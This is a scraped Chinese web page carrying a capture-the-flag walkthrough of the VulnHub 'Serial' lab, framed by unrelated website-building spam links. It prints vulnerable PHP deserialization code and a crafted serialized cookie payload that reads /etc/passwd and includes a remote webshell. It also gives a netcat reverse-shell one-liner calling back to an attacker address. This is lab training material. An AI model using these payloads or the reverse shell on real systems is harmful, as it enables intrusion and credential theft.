当前位置: 首页 > news >正文

深圳个性化建网站公司简便网站建设

深圳个性化建网站公司,简便网站建设,金融投资理财网站建设,梅州东莞网站建设一.信息收集 靶机地址下载#xff1a;https://download.vulnhub.com/serial/serial.zip 打开靶机#xff0c;在kali虚拟机中进行主机存活探测 可以知道靶机ip地址为192.168.133.171 然后扫描端口 可以发现有一个22端口跟80端口 然后接下来用kali扫描它的目录 可以发现有一…一.信息收集 靶机地址下载https://download.vulnhub.com/serial/serial.zip 打开靶机在kali虚拟机中进行主机存活探测 可以知道靶机ip地址为192.168.133.171 然后扫描端口 可以发现有一个22端口跟80端口 然后接下来用kali扫描它的目录  可以发现有一个可访问的目录 我们去访问一下 访问之后backup目录下有一个bak.zip 下载下来 下载下来之后有三个文件  分析一下 index.php ?php     include(user.class.php);     if(!isset($_COOKIE[user])) {         setcookie(user, base64_encode(serialize(new User(sk4))));     } else {         unserialize(base64_decode($_COOKIE[user]));     }     echo This is a beta test for new cookie handler\n; ? log.class.php ?php   class Log {     private $type_log;     function __costruct($hnd) {       $this-$type_log $hnd;     }     public function handler($val) {       include($this-type_log);       echo LOG: . $val;     }   } ? user.class.php ?php   include(log.class.php);   class Welcome {     public function handler($val) {       echo Hello . $val;     }   }   class User {     private $name;     private $wel;     function __construct($name) {       $this-name $name;       $this-wel new Welcome();     }     function __destruct() {       //echo bye\n;       $this-wel-handler($this-name);     }   } ? 提示cookieburpsuite抓包看一下cookie cookie那里有一串base64加密的 解密一下 base64解码得到序列化后字段是 O:4:User:2:{s:10:Username;s:3:sk4;s:9:Userwel;O:7:Welcome:0:{}} 然后我们构造payload 读取/etc/passwd文件 O:4:User:2:{s:10:\x00User\x00name;s:5:admin;s:9:\x00User\x00wel;O:3:Log:1:{s:8:type_log;s:11:/etc/passwd;}}) base64编码 Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0 然后再次抓包 打开用burp的repeater 将加密后的替换一下 就可以看到  然后成功包含  看到有一个sk4用户可登陆 get shell 构造序列化语句上传shell 生成一个shell放在本地网站下 然后构造payload尝试读取passwd文件payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马 ?phpclass Log {private $type_log /etc/passwd;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();} } $obj new User(); echo base64_encode(serialize($obj));然后去访问自己新创建的php 我这里用的是7.php 打开就看到他的base64编码 然后去抓包 把访问7.php得到的base64编码 替换cookie 成功执行 开始反弹shell rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i21|nc1192.168.133.1636666/tmp/f 将上述代码url编码后填入参数位置 然后在kali里开启监听监听成功  在攻击模块发送 成功获取shell 查看文件多返回几次上级目录找到一个txt文件 查看文件得到他的账号跟密码 最后在远程连接 成功进入
http://www.w-s-a.com/news/60690/

相关文章:

  • 网站安全狗十大免费ppt网站在线
  • 进网站后台显示空白图片模板 网站源码
  • dedecms 英文网站怎么在网站上做模式题库
  • 轻网站怎么建立国外做评论的网站
  • 拉米拉网站建设乐清网站网站建设
  • 获取网站全站代码申请免费域名的方法
  • 网站制作建设公司哪家好wordpress仪表盘打不开
  • 最佳网站制作模板用手机能创建网站吗
  • 只做黑白摄影的网站网站建设好后给领导作介绍
  • 移动手机网站建设如何做网站地图视频
  • 手工业网站怎么做成都酒吧设计公司
  • .net 网站生成安装文件目录重庆网站建设沛宣网络
  • 怎么做钓鱼网站吗百度免费域名注册网站
  • 如何给网站做外部优化今年国内重大新闻
  • 有没有做生物科技相关的网站弄一个app大概多少钱
  • 五金加工东莞网站建设怎么做网页跳转
  • 淄博网站优化价格wordpress没有小工具
  • 自己搭建服务器做视频网站wordpress发布文章 发布
  • php仿博客园网站阅读分享网站模板
  • 网站宣传的劣势域名注册长沙有限公司
  • 怎样联系自己建设网站企业怎样做好网站建设
  • 网站制作需求分析电商网站建设浩森宇特
  • 淄博网站建设招聘摄影网站建设的论文
  • 怎么把凡科网里做的网站保存成文件网站建设研究的意义
  • 服务器2003怎么做网站网站建设服务器的配置
  • 高校网站建设方案网站推广软件下载安装免费
  • 重庆没建网站的企业网站开发软件 连接SQL数据库
  • 百度申诉网站沉默是金
  • 如何自己建网站wordpress图片延时加载
  • 甘肃省住房和城乡建设厅注册中心网站千博企业网站管理系统2013